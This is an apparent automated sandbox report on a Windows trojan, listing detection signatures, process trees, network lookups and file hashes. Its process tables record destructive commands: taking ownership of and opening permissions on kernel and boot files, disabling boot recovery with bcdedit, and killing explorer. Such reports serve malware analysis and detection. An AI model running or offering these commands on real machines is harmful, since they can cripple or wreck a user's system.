Analysis Overview
| SHA256 | 88dd80a8d210b7e0f0fa327424c32b95542d9792ea28382fa0d0a71c4d211efc |
| Threat Level | Likely malicious |
The file 88dd80a8d210b7e0f0fa327424c32b95542d9792ea28382fa0d0a71c4d211efc was found to be: Likely malicious.
Malicious Activity Summary
Modifies boot configuration data using bcdedit
Possible privilege escalation attempt
Checks computer location settings
Modifies file permissions
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Drops file in Windows directory
Drops file in Program Files directory
Unsigned PE
Enumerates physical storage devices
Modifies registry class
Kills process with taskkill
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Delays execution with timeout.exe
Analysis: static1
Detonation Overview
| Reported | 2024-06-19 12:33 |
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral4
Detonation Overview
| Submitted | 2024-06-19 12:33 |
| Reported | 2024-06-19 12:36 |
| Platform | win10v2004-20240508-en |
| Max time kernel | 51s |
| Max time network | 51s |
| Command Line | |
Signatures
Processes
| Process | Command line |
| C:\Windows\System32\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.vbs" |
Network
Files
Analysis: behavioral7
Detonation Overview
| Submitted | 2024-06-19 12:33 |
| Reported | 2024-06-19 12:36 |
| Platform | win7-20231129-en |
| Max time kernel | 120s |
| Max time network | 120s |
| Command Line | |
Signatures
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2244 wrote to memory of 1844 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe | C:\Windows\system32\cmd.exe |
| PID 1844 wrote to memory of 2628 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WScript.exe |
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe | "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe" |
| C:\Windows\system32\cmd.exe | "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\D88.tmp\D89.tmp\D8A.bat C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe" |
| C:\Windows\System32\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.vbs" |
Network
Files
C:\Users\Admin\AppData\Local\Temp\D88.tmp\D89.tmp\D8A.bat
| MD5 | 4c46c91a5d1a43115e11db625f322414 |
| SHA1 | 53c015fe4cf56784db8eaf28048d4cfae09ffa86 |
| SHA256 | 91e88cdab236b8221194160b904c63899baac408596725153245ca8f39c29524 |
| SHA512 | a30ee881c718c2a90b5563f58dca470da353d5e3b7b1e74b0f0c777dd05adafc357a4363a1a0814b6889378c0f37d02e742ab2542f5ec18b3ffd5518285ecfda |
Analysis: behavioral9
Detonation Overview
| Submitted | 2024-06-19 12:33 |
| Reported | 2024-06-19 12:36 |
| Platform | win7-20240611-en |
| Max time kernel | 118s |
| Max time network | 119s |
| Command Line | |
Signatures
Processes
| Process | Command line |
| C:\Windows\System32\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.vbs" |
Network
Files
Analysis: behavioral11
Detonation Overview
| Submitted | 2024-06-19 12:33 |
| Reported | 2024-06-19 12:36 |
| Platform | win7-20240611-en |
| Max time kernel | 120s |
| Max time network | 120s |
| Command Line | |
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1916 wrote to memory of 2052 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\choice.exe |
Processes
| Process | Command line |
| C:\Windows\system32\cmd.exe | cmd /c "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.bat" |
| C:\Windows\system32\choice.exe | choice /c yn /n /m "" |
Network
Files
Analysis: behavioral21
Detonation Overview
| Submitted | 2024-06-19 12:33 |
| Reported | 2024-06-19 12:36 |
| Platform | win7-20240611-en |
| Max time kernel | 130s |
| Max time network | 118s |
| Command Line | |
Signatures
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Process | Command line |
| C:\Windows\system32\cmd.exe | cmd /c "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winntcus64.bat" |
| C:\Windows\system32\takeown.exe | takeown /f "C:\Windows\System32\ntoskrnl.exe" |
| C:\Windows\system32\icacls.exe | icacls "C:\Windows\System32\ntoskrnl.exe" /grant everyone:F |
| C:\Windows\system32\takeown.exe | takeown /f "C:\Windows\System32\hal.dll" |
| C:\Windows\system32\icacls.exe | icacls "C:\Windows\System32\hal.dll" /grant everyone:F |
| C:\Windows\system32\takeown.exe | takeown /f "C:\Windows\System32\ci.dll" |
| C:\Windows\system32\icacls.exe | icacls "C:\Windows\System32\ci.dll" /grant everyone:F |
| C:\Windows\system32\takeown.exe | takeown /f "C:\Windows\System32\winload.efi" |
| C:\Windows\system32\icacls.exe | icacls "C:\Windows\System32\winload.efi" /grant everyone:F |
| C:\Windows\system32\bcdedit.exe | bcdedit /set {default} recoveryenabled no |
| C:\Windows\system32\taskkill.exe | taskkill /f /im explorer.exe |
| C:\Windows\system32\cmd.exe | cmd.exe |
| C:\Windows\system32\mspaint.exe | mspaint.exe |
| C:\Windows\system32\notepad.exe | notepad.exe |
| C:\Windows\system32\timeout.exe | timeout /t 30 /nobreak |
Network
Files
memory/2568-0-0x000007FEFA890000-0x000007FEFA8DC000-memory.dmp
Analysis: behavioral1
Detonation Overview
| Submitted | 2024-06-19 12:33 |
| Reported | 2024-06-19 12:36 |
| Platform | win7-20240611-en |
| Max time kernel | 118s |
| Max time network | 124s |
| Command Line | |
Signatures
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2176 wrote to memory of 1700 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.exe | C:\Windows\system32\wscript.exe |
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.exe | "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.exe" |
| C:\Windows\system32\wscript.exe | "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\6BFC.tmp\6C0D.tmp\6C0E.vbs //Nologo |
Network
Files
C:\Users\Admin\AppData\Local\Temp\6BFC.tmp\6C0D.tmp\6C0E.vbs
| MD5 | 82455ed5816ace2c6842dc84cb620b37 |
| SHA1 | cade773fe4a7bc311a08829f3b38e08ae7c1415a |
| SHA256 | 7c77c0d848319480ea3741e98baf3b3bbf5cb719cab16f5a8474f647bd172c6e |
| SHA512 | 960b6cf94bffd79e6278d3ab035a0cd7038ac6148102754936adce0197f0568caee55560eeb18df981172b868d72bf6c2595633a7fb8443d75e5a1359f7105a6 |
Analysis: behavioral2
Detonation Overview
| Submitted | 2024-06-19 12:33 |
| Reported | 2024-06-19 12:36 |
| Platform | win10v2004-20240226-en |
| Max time kernel | 143s |
| Max time network | 155s |
| Command Line | |
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 440 wrote to memory of 1844 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.exe | C:\Windows\system32\wscript.exe |
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.exe | "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.exe" |
| C:\Windows\system32\wscript.exe | "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\D5AF.tmp\D5B0.tmp\D5B1.vbs //Nologo |
| C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3996 --field-trial-handle=2276,i,5697607538120380977,9987005253899555344,262144 --variations-seed-version /prefetch:8 |
Network
| Country | Destination | Domain | Proto |
| GB | 96.16.110.114:80 | | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.113.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| GB | 142.250.187.234:443 | | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.121.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.179.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\D5AF.tmp\D5B0.tmp\D5B1.vbs
| MD5 | 82455ed5816ace2c6842dc84cb620b37 |
| SHA1 | cade773fe4a7bc311a08829f3b38e08ae7c1415a |
| SHA256 | 7c77c0d848319480ea3741e98baf3b3bbf5cb719cab16f5a8474f647bd172c6e |
| SHA512 | 960b6cf94bffd79e6278d3ab035a0cd7038ac6148102754936adce0197f0568caee55560eeb18df981172b868d72bf6c2595633a7fb8443d75e5a1359f7105a6 |
Analysis: behavioral12
Detonation Overview
| Submitted | 2024-06-19 12:33 |
| Reported | 2024-06-19 12:36 |
| Platform | win10v2004-20240611-en |
| Max time kernel | 142s |
| Max time network | 124s |
| Command Line | |
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1200 wrote to memory of 4740 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\choice.exe |
Processes
| Process | Command line |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.bat" |
| C:\Windows\system32\choice.exe | choice /c yn /n /m "" |
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| BE | 88.221.83.187:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
Files
Analysis: behavioral14
Detonation Overview
| Submitted | 2024-06-19 12:33 |
| Reported | 2024-06-19 12:36 |
| Platform | win10v2004-20240508-en |
| Max time kernel | 51s |
| Max time network | 51s |
| Command Line | |
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 856 wrote to memory of 4800 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe | C:\Windows\system32\cmd.exe |
| PID 4800 wrote to memory of 4864 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\choice.exe |
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe | "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe" |
| C:\Windows\system32\cmd.exe | "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\420A.tmp\420B.tmp\420C.bat C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe" |
| C:\Windows\system32\choice.exe | choice /c yn /n /m "" |
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\420A.tmp\420B.tmp\420C.bat
| MD5 | 7c9274396b81ebfe6570c3b6b962e91c |
| SHA1 | d1768cf3a09cc3d652ae71fde70fc76d5c472b90 |
| SHA256 | c5c3916b24fb9aaeb3347e28d3f5ff555b06b4c631fcd779c57cdbac31c83f89 |
| SHA512 | a01a9db207e652a678d45919d306f2068fa6691fe8ed7e8d800f76c9fb9598b739926333283da7dfee187f4a7d57964075b1b8c90739057136b930791956cae3 |
Analysis: behavioral15
Detonation Overview
| Submitted | 2024-06-19 12:33 |
| Reported | 2024-06-19 12:36 |
| Platform | win7-20240611-en |
| Max time kernel | 118s |
| Max time network | 123s |
| Command Line | |
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2948 wrote to memory of 3020 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.exe | C:\Windows\system32\cscript.exe |
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.exe | "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.exe" |
| C:\Windows\system32\cscript.exe | "C:\Windows\sysnative\cscript" C:\Users\Admin\AppData\Local\Temp\70BD.tmp\70BE.tmp\70BF.vbs //Nologo |
Network
Files
C:\Users\Admin\AppData\Local\Temp\70BD.tmp\70BE.tmp\70BF.vbs
| MD5 | 82455ed5816ace2c6842dc84cb620b37 |
| SHA1 | cade773fe4a7bc311a08829f3b38e08ae7c1415a |
| SHA256 | 7c77c0d848319480ea3741e98baf3b3bbf5cb719cab16f5a8474f647bd172c6e |
| SHA512 | 960b6cf94bffd79e6278d3ab035a0cd7038ac6148102754936adce0197f0568caee55560eeb18df981172b868d72bf6c2595633a7fb8443d75e5a1359f7105a6 |
Analysis: behavioral16
Detonation Overview
| Submitted | 2024-06-19 12:33 |
| Reported | 2024-06-19 12:36 |
| Platform | win10v2004-20240226-en |
| Max time kernel | 142s |
| Max time network | 147s |
| Command Line | |
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4544 wrote to memory of 408 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.exe | C:\Windows\system32\cscript.exe |
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.exe | "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.exe" |
| C:\Windows\system32\cscript.exe | "C:\Windows\sysnative\cscript" C:\Users\Admin\AppData\Local\Temp\F53D.tmp\F53E.tmp\F53F.vbs //Nologo |
| C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3816 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8 |
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 13.107.246.64:443 | | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\F53D.tmp\F53E.tmp\F53F.vbs
| MD5 | 82455ed5816ace2c6842dc84cb620b37 |
| SHA1 | cade773fe4a7bc311a08829f3b38e08ae7c1415a |
| SHA256 | 7c77c0d848319480ea3741e98baf3b3bbf5cb719cab16f5a8474f647bd172c6e |
| SHA512 | 960b6cf94bffd79e6278d3ab035a0cd7038ac6148102754936adce0197f0568caee55560eeb18df981172b868d72bf6c2595633a7fb8443d75e5a1359f7105a6 |
Analysis: behavioral6
Detonation Overview
| Submitted | 2024-06-19 12:33 |
| Reported | 2024-06-19 12:36 |
| Platform | win10v2004-20240508-en |
| Max time kernel | 150s |
| Max time network | 56s |
| Command Line | |
Signatures
Processes
| Process | Command line |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msg.bat" |
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral19
Detonation Overview
| Submitted | 2024-06-19 12:33 |
| Reported | 2024-06-19 12:36 |
| Platform | win7-20240221-en |
| Max time kernel | 64s |
| Max time network | 122s |
| Command Line | |
Signatures
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winnt64.exe | "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winnt64.exe" |
| C:\Windows\system32\cmd.exe | "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F5C.tmp\F5D.tmp\F5E.bat C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winnt64.exe" |
| C:\Windows\system32\takeown.exe | takeown /f "C:\Windows\System32\ntoskrnl.exe" |
| C:\Windows\system32\icacls.exe | icacls "C:\Windows\System32\ntoskrnl.exe" /grant everyone:F |
| C:\Windows\system32\takeown.exe | takeown /f "C:\Windows\System32\hal.dll" |
| C:\Windows\system32\icacls.exe | icacls "C:\Windows\System32\hal.dll" /grant everyone:F |
| C:\Windows\system32\takeown.exe | takeown /f "C:\Windows\System32\ci.dll" |
| C:\Windows\system32\icacls.exe | icacls "C:\Windows\System32\ci.dll" /grant everyone:F |
| C:\Windows\system32\takeown.exe | takeown /f "C:\Windows\System32\winload.efi" |
| C:\Windows\system32\icacls.exe | icacls "C:\Windows\System32\winload.efi" /grant everyone:F |
| C:\Windows\system32\bcdedit.exe | bcdedit /set {default} recoveryenabled no |
| C:\Windows\system32\taskkill.exe | taskkill /f /im explorer.exe |
| C:\Windows\system32\cmd.exe | cmd.exe |
| C:\Windows\system32\mspaint.exe | mspaint.exe |
| C:\Windows\system32\notepad.exe | notepad.exe |
| C:\Windows\system32\timeout.exe | timeout /t 30 /nobreak |
Network
Files
C:\Users\Admin\AppData\Local\Temp\F5C.tmp\F5D.tmp\F5E.bat
| MD5 | fdc1bd905021633dfd77610ba86f7663 |
| SHA1 | 101d7151ce4993d4f314ac2e837a9f9292846cb5 |
| SHA256 | 439296ca854b289a4edb016c1ae4c37caeecd23bed10e512fc8b45c4259de9f8 |
| SHA512 | b6e6ec61cfae62c9e19e3882562e4f5ac0a53ade92d29e5cd5029e80b0a6462b09e7554493b50487cf7a18cabd823de297b8851b02677d5753eec9fee903653e |
memory/2652-2-0x000007FEF86E0000-0x000007FEF872C000-memory.dmp
memory/2652-3-0x000007FEF86E0000-0x000007FEF872C000-memory.dmp
Analysis: behavioral20
Detonation Overview
| Submitted | 2024-06-19 12:33 |
| Reported | 2024-06-19 12:36 |
| Platform | win10v2004-20240611-en |
| Max time kernel | 149s |
| Max time network | 151s |
| Command Line | |
Signatures
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winnt64.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\WindowsApps\MIBCE0~1.0_X\APPXMA~1.XML | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DELETE~1\MI20B0~1.SCA\Assets\GA68FE~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI05FA~1.0_X\Assets\Square44x44Logo.targetsize-40.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI0A11~1.0_X\images\OneNoteSectionWideTile.scale-200.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MIB28C~1.0_X\Assets\AppList.targetsize-64.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI11B4~1.0_X\images\LinkedInboxBadge.scale-150.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI05FA~1.0_X\RUNTIM~1.WIN | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI6132~1.0_X\Assets\CONTRA~1\AppList.targetsize-256_altform-unplated_contrast-black.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI11B4~1.0_X\images\1851_2~2.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI11B4~1.0_X\images\HxMailAppList.targetsize-60_altform-unplated.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI11B4~1.0_X\images\HxMailWideTile.scale-150.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI0A11~1.0_X\en-gb\LOCIMA~1\offsymt.ttf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MIEA2E~1.0_X\Assets\1X1TRA~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI46F3~1.0_X\Assets\CONTRA~1\PeopleAppList.targetsize-32.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI83BA~1.0_X\Assets\INA134~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MID54F~1.0_X\Assets\PH49F9~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI83BA~1.0_X\Assets\InsiderHubAppList.targetsize-40_altform-unplated_contrast-black.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MIB44A~1.0_X\Assets\CA459E~1.PNG | C:\Windows\system32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winnt64.exe
"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winnt64.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4527.tmp\4528.tmp\4529.bat C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winnt64.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\ntoskrnl.exe"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\ntoskrnl.exe" /grant everyone:F
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\hal.dll"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\hal.dll" /grant everyone:F
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\ci.dll"
